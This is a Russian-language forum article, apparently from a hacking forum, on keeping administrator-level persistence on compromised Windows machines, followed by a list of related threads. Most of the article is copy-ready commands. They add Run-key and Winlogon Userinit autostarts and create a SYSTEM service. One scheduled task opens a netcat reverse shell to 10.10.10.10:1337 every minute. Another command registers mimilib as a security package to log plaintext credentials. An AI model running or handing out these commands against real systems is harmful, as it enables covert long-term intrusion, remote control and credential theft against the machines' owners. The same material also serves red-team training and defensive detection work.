Статья Техники персистенции в Windows с правами администратора

devqp

Премиум
Персистенция — набор техник для сохранения доступа к системе после перезагрузки, смены учётных данных или иных прерываний сессии. Рассмотрим методы, доступные при наличии административных прав.

Реестр: автозагрузка через Run-ключи
Добавление исполняемого файла в ветки реестра автозапуска обеспечивает его выполнение при входе пользователя с текущим уровнем привилегий. Основные пути:
Код:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

Службы (Services)
Конфигурация служб хранится в реестре. Создание новой службы позволяет запускать бинарник при загрузке системы с правами SYSTEM:
Код:
sc create redteam binpath= "PATH TO BINARY" start="auto" obj="LocalSystem"

Планировщик задач (Task Scheduler)
Запуск программ по расписанию или при старте системы с возможностью эскалации привилегий:
Код:
schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr 'c:\Users\User\Downloads/nc.exe 10.10.10.10 1337 -e cmd.exe'
schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password

Кастомный SSP (Security Service Provider)
Внедрение DLL для перехвата учётных данных в plain-text через mimilib.dll:
Код:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
Перехваченные данные сохраняются в SYSTEM32\kiwissp.txt.

Подмена контекстного меню
Исполнение шелл-кода при вызове контекстного меню (правый клик мыши). Реализация через инструменты типа ContextMenuHijack.

Модификация Userinit
Добавление исполняемого файла в ключ Winlogon для запуска при входе пользователя:
Код:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Some\Evil\Binary.exe","C:\Windows\system32\userinit.exe"
 
Похожие темы
devqp Статья Техники персистенции в пользовательском режиме: методы и инструменты Уязвимости и взлом 0
Admin Интересно Новое топливо CycloKinetics увеличит дальность и эффективность военной техники. Новости в сети 0
Admin Интересно Удаленный запуск кода и захват системы. Владельцам техники GIGABYTE нужно срочно обновить софт. Новости в сети 0
Admin Интересно Конфликт на Ближнем Востоке удорожает и задерживает поставки техники. Новости в сети 0
АнАлЬнАя ЧуПаКаБрА INLINE Shop техники с коинами Готовый софт 0
K Эволюция гипноза. Новейшие техники активации сознания. Жан Беккио Раздачи и сливы 0
K Техники современной гипнотерапии. Гипноз. Практика. Раздачи и сливы 0
devqp Статья Скрытый автозапуск Amadey: анализ недетектируемого метода через реестр Windows Вирусология 0
Admin Интересно Windows 11 показала тройное превосходство над Linux в локальных ИИ-задачах. Новости в сети 0
Admin Интересно Windows-серверы застряли без обновлений. Microsoft признала масштабный сбой WSUS. Новости в сети 0
devqp Статья Обнаружение защитных решений в Windows после компрометации Уязвимости и взлом 0
Admin Интересно Исследователь опубликовал эксплойт для уязвимости в Windows после обновления Microsoft. Новости в сети 0
Admin Интересно Microsoft выпустила расширенное обновление безопасности KB5099539 для Windows 10. Новости в сети 0
devqp Статья DEFUSB: Автоматическая блокировка Windows при подключении неизвестных USB-устройств Анонимность и приватность 0
Admin UFOLABSNEWS Microsoft увеличит объем исправлений безопасности в Windows 11. Новости в сети 0
Admin UFOLABSNEWS Windows временно потеряла долю рынка из-за ошибки в подсчётах StatCounter. Новости в сети 0
devqp Статья Развертывание Мобильной Socks5 Прокси-Фермы с UDP и Сменным Fingerprint в Windows Анонимность и приватность 0
Admin UFOLABSNEWS Microsoft изменит подход к резервному копированию настроек в Windows 11 26H2. Новости в сети 0
Admin UFOLABSNEWS Microsoft запускает функцию восстановления Windows 11 Cloud Rebuild, которая обходит использование USB. Новости в сети 0
Admin UFOLABSNEWS Valve выпустила обновление Proton, которое расширяет совместимость игр для Windows на Linux. Новости в сети 0
Admin UFOLABSNEWS ФБР использовало идентификатор устройства Windows для отслеживания хакера. Новости в сети 0
Admin UFOLABSNEWS Опасная ошибка в Windows 11 незаметно потребляет сотни гигабайт памяти. Новости в сети 0
Admin UFOLABSNEWS Античит-драйвер оказался уязвимым и позволяет повышать привилегии в Windows. Новости в сети 0
Admin UFOLABSNEWS Эксплойт The Gentlemen обходит защиту Windows на уровне ядра. Новости в сети 0
Admin UFOLABSNEWS Microsoft тестирует новый облик меню «Пуск» в Windows 11. Новости в сети 0
Admin UFOLABSNEWS Microsoft представила новую функцию восстановления системы в Windows 11. Новости в сети 0
Admin UFOLABSNEWS Windows 11 получила функцию полного отката системы к предыдущему состоянию. Новости в сети 0
Admin UFOLABSNEWS Microsoft подтвердила ошибку в июньском обновлении Windows, вызывающую отображение странных имён файлов. Новости в сети 0
Admin Интересно Microsoft раскрыла детали кампании вредоносного ПО Windows Clipper, использующего USB LNK червя и Tor для управления. Новости в сети 0
Admin Интересно Обнаружены новые версии бэкдора SprySOCKS для Windows. Новости в сети 0
Admin Интересно Китайский бэкдор SprySOCKS теперь доступен и для Windows. Новости в сети 0
Admin Интересно Обнаружены новые версии бэкдора SprySOCKS для Windows. Новости в сети 0
Admin Интересно Встроенный в Windows антивирус теперь работает на взломщиков и раздаёт права SYSTEM. Новости в сети 0
Admin Интересно Microsoft наконец добавит настройку контекстного меню в Windows 11. Новости в сети 0
Admin Интересно В Windows обнаружена новая уязвимость MiniPlasma. Новости в сети 0
Admin Интересно Microsoft добавила в Windows привычные команды Unix. Новости в сети 0
Admin Интересно Неисправленная уязвимость в Windows Search позволяет злоумышленникам красть хэши NTLMv2. Новости в сети 0
Admin Интересно Критическая уязвимость в Netlogon позволяет злоумышленникам удалённо выполнять код на серверах Windows. Новости в сети 0
Admin Интересно Grandoreiro и BTMOB атакуют пользователей Windows и Android в Латинской Америке и Европе. Новости в сети 0
Admin Интересно Microsoft внесёт изменения в Windows на следующей неделе. Новости в сети 0
Admin Интересно Исследование уязвимостей драйверов Windows без необходимости в физическом оборудовании. Новости в сети 0
Admin Интересно 260 символов, 126 уровней и 8,5 × 10³⁷ путей: GhostTree запутывает EDR и антивирусы в Windows. Новости в сети 0
Admin Интересно Старая утилита Windows MSHTA стала инструментом для кражи криптовалюты. Новости в сети 0
Admin Интересно Устаревший инструмент Windows MSHTA стал популярным инструментом хакеров. Новости в сети 0
Admin Интересно Служба факсов в Windows всё ещё существует и может быть использована для получения прав SYSTEM. Новости в сети 0
Admin Интересно Новая уязвимость MiniPlasma позволяет повысить привилегии до уровня SYSTEM на полностью обновлённых системах Windows. Новости в сети 0
Admin Интересно Меню «Пуск» открывается на 70% быстрее, приложения — на 40%. Microsoft тихо тестирует механизм, который делает Windows 11 отзывчивее без апгрейда желе Новости в сети 0
Admin Интересно Официальный сайт JDownloader распространял вредоносное ПО для пользователей Windows и Linux. Новости в сети 0
Admin Интересно Вредоносные пакеты PyPI распространяют ZiChatBot через Zulip API на Windows и Linux. Новости в сети 0
Admin Интересно Китайская группировка Dragon Breath использует уязвимый драйвер для атак на Windows. Новости в сети 0

Название темы